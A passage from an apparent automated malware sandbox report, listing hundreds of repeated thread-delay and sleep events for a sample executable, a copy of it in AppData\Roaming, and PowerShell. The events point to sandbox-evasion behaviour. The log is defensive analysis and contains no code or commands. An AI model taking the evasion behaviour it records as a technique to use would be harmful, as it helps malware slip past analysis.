Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 595500	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 595250	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 595141	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 595000	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 594891	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 594782	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 594657	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 594547	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 594438	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 594328	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 594219	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 599859
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 599744
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 599625
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 599514
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 599393
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 599234
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 599125
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 599016
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 598891
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 598781
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 598672
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 598557
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 598438
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 598313
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 598203
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 598094
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 597969
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 597859
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 597712
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 597594
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 597484
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 597375
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 597265
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 597156
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 597047
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 596937
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 596828
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 596719
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 596609
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 596500
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 596391
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 596281
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 596171
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 596062
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 595953
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 595844
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 595734
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 595625
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 595516
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 595406
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 595297
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 595187
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 595078
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 594969
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 594859
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 594750
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 594641
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 594531
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 594422

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6472	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 607	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6897	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 470	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Window / User API: threadDelayed 1921	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Window / User API: threadDelayed 7918	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Window / User API: threadDelayed 2334
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Window / User API: threadDelayed 7523

Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 6484	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5320	Thread sleep count: 6472 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5912	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7080	Thread sleep count: 607 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5512	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3620	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4712	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512	Thread sleep count: 33 > 30	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512	Thread sleep time: -30437127721620741s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5912	Thread sleep count: 1921 > 30	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5912	Thread sleep count: 7918 > 30	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512	Thread sleep time: -599424s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512	Thread sleep time: -599297s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512	Thread sleep time: -599188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512	Thread sleep time: -599063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512	Thread sleep time: -598953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512	Thread sleep time: -598844s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512	Thread sleep time: -598719s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512	Thread sleep time: -598610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512	Thread sleep time: -598485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512	Thread sleep time: -598360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512	Thread sleep time: -598235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512	Thread sleep time: -598110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512	Thread sleep time: -597985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512	Thread sleep time: -597860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512	Thread sleep time: -597749s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512	Thread sleep time: -597625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512	Thread sleep time: -597516s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512	Thread sleep time: -597391s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512	Thread sleep time: -597282s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512	Thread sleep time: -597157s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512	Thread sleep time: -597032s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512	Thread sleep time: -596922s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512	Thread sleep time: -596813s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512	Thread sleep time: -596688s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512	Thread sleep time: -596563s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512	Thread sleep time: -596438s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512	Thread sleep time: -596328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512	Thread sleep time: -596203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512	Thread sleep time: -596094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512	Thread sleep time: -595985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512	Thread sleep time: -595860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512	Thread sleep time: -595735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512	Thread sleep time: -595610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512	Thread sleep time: -595500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512	Thread sleep time: -595360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512	Thread sleep time: -595250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512	Thread sleep time: -595141s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512	Thread sleep time: -595000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512	Thread sleep time: -594891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512	Thread sleep time: -594782s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512	Thread sleep time: -594657s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512	Thread sleep time: -594547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512	Thread sleep time: -594438s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512	Thread sleep time: -594328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe TID: 5512	Thread sleep time: -594219s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 7044	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464	Thread sleep time: -25825441703193356s >= -30000s
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 1340	Thread sleep count: 2334 > 30
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464	Thread sleep time: -599859s >= -30000s
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 1340	Thread sleep count: 7523 > 30
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464	Thread sleep time: -599744s >= -30000s
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464	Thread sleep time: -599625s >= -30000s
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464	Thread sleep time: -599514s >= -30000s
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464	Thread sleep time: -599393s >= -30000s
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464	Thread sleep time: -599234s >= -30000s
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464	Thread sleep time: -599125s >= -30000s
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464	Thread sleep time: -599016s >= -30000s
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464	Thread sleep time: -598891s >= -30000s
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464	Thread sleep time: -598781s >= -30000s
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464	Thread sleep time: -598672s >= -30000s
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464	Thread sleep time: -598557s >= -30000s
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464	Thread sleep time: -598438s >= -30000s
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464	Thread sleep time: -598313s >= -30000s
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464	Thread sleep time: -598203s >= -30000s
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464	Thread sleep time: -598094s >= -30000s
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464	Thread sleep time: -597969s >= -30000s
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464	Thread sleep time: -597859s >= -30000s
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464	Thread sleep time: -597712s >= -30000s
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464	Thread sleep time: -597594s >= -30000s
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464	Thread sleep time: -597484s >= -30000s
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464	Thread sleep time: -597375s >= -30000s
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464	Thread sleep time: -597265s >= -30000s
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464	Thread sleep time: -597156s >= -30000s
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464	Thread sleep time: -597047s >= -30000s
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464	Thread sleep time: -596937s >= -30000s
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464	Thread sleep time: -596828s >= -30000s
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464	Thread sleep time: -596719s >= -30000s
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464	Thread sleep time: -596609s >= -30000s
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464	Thread sleep time: -596500s >= -30000s
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464	Thread sleep time: -596391s >= -30000s
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464	Thread sleep time: -596281s >= -30000s
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464	Thread sleep time: -596171s >= -30000s
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464	Thread sleep time: -596062s >= -30000s
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464	Thread sleep time: -595953s >= -30000s
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464	Thread sleep time: -595844s >= -30000s
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464	Thread sleep time: -595734s >= -30000s
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464	Thread sleep time: -595625s >= -30000s
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464	Thread sleep time: -595516s >= -30000s
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464	Thread sleep time: -595406s >= -30000s
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464	Thread sleep time: -595297s >= -30000s
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464	Thread sleep time: -595187s >= -30000s
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464	Thread sleep time: -595078s >= -30000s
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464	Thread sleep time: -594969s >= -30000s
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464	Thread sleep time: -594859s >= -30000s
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464	Thread sleep time: -594750s >= -30000s
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464	Thread sleep time: -594641s >= -30000s
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464	Thread sleep time: -594531s >= -30000s
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe TID: 5464	Thread sleep time: -594422s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6484	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1972	Thread sleep time: -30000s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 599424	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 599297	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 598953	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 598844	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 598719	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 598610	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 598485	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 598235	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 597749	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 597625	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 597516	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 597391	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 597282	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 597157	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 597032	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 596922	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 596813	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 596688	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 596563	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 596438	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 596328	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 596203	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 596094	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 595500	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 595250	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 595141	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 595000	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 594891	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 594782	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 594657	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 594547	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 594438	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 594328	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Thread delayed: delay time: 594219	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 599859
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 599744
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 599625
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 599514
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 599393
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 599234
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 599125
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 599016
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 598891
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 598781
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 598672
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 598557
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 598438
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 598313
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Thread delayed: delay time: 598203
